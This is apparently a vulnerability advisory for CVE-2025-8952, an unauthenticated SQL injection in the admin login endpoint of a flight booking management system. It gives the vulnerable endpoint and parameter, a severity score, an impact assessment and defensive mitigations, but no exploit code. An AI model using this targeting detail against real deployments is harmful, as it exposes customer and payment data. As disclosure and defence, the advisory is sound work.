CVE-2025-8952 is a SQL Injection vulnerability identified in version 1.0 of the Campcodes Online Flight Booking Management System. The vulnerability exists in the login functionality, specifically in the /admin/ajax.php endpoint when the 'action=login' parameter is invoked. The attack vector involves manipulation of the 'Username' argument, which is not properly sanitized or parameterized, allowing an attacker to inject malicious SQL code. This injection can be performed remotely without requiring any authentication or user interaction, making it a highly accessible attack surface. The vulnerability allows an attacker to execute arbitrary SQL commands on the backend database, potentially leading to unauthorized data access, data modification, or even complete compromise of the database server. The CVSS 4.0 score of 6.9 (medium severity) reflects the ease of exploitation (network accessible, no privileges or user interaction required) but limits the impact due to low to limited confidentiality, integrity, and availability impacts. However, the vulnerability's presence in a flight booking system's administrative login component raises concerns about exposure of sensitive customer data, booking details, and administrative controls. Although no public exploits are currently known in the wild, the disclosure of the exploit code increases the risk of exploitation by opportunistic attackers. The lack of available patches or mitigations from the vendor further exacerbates the threat landscape for affected users.

For European organizations using the Campcodes Online Flight Booking Management System, this vulnerability poses a significant risk to the confidentiality and integrity of sensitive customer and operational data. Flight booking systems typically handle personally identifiable information (PII), payment details, travel itineraries, and administrative credentials. Exploitation could lead to unauthorized data disclosure, financial fraud, disruption of booking operations, and reputational damage. Additionally, attackers could leverage the vulnerability to pivot within the network, potentially compromising other critical systems. Given the critical nature of the aviation and travel sector in Europe, such a breach could also attract regulatory scrutiny under GDPR for data protection violations, resulting in fines and legal consequences. The remote and unauthenticated nature of the vulnerability increases the likelihood of exploitation, especially if the system is exposed to the internet without adequate network-level protections.

1. Immediate mitigation should involve restricting access to the /admin/ajax.php endpoint to trusted IP addresses or internal networks only, using firewall rules or VPN access. 2. Implement Web Application Firewall (WAF) rules specifically designed to detect and block SQL injection attempts targeting the 'Username' parameter. 3. Conduct a thorough code review and refactor the login functionality to use parameterized queries or prepared statements to eliminate SQL injection vectors. 4. Apply input validation and sanitization on all user-supplied inputs, especially those involved in authentication processes. 5. Monitor logs for suspicious activity related to login attempts and SQL errors that could indicate exploitation attempts. 6. Engage with the vendor for official patches or updates; if unavailable, consider migrating to alternative flight booking platforms with better security postures. 7. Regularly back up databases and ensure backups are stored securely to enable recovery in case of data tampering or loss. 8. Educate administrative users about the risks and signs of compromise to enable early detection and response.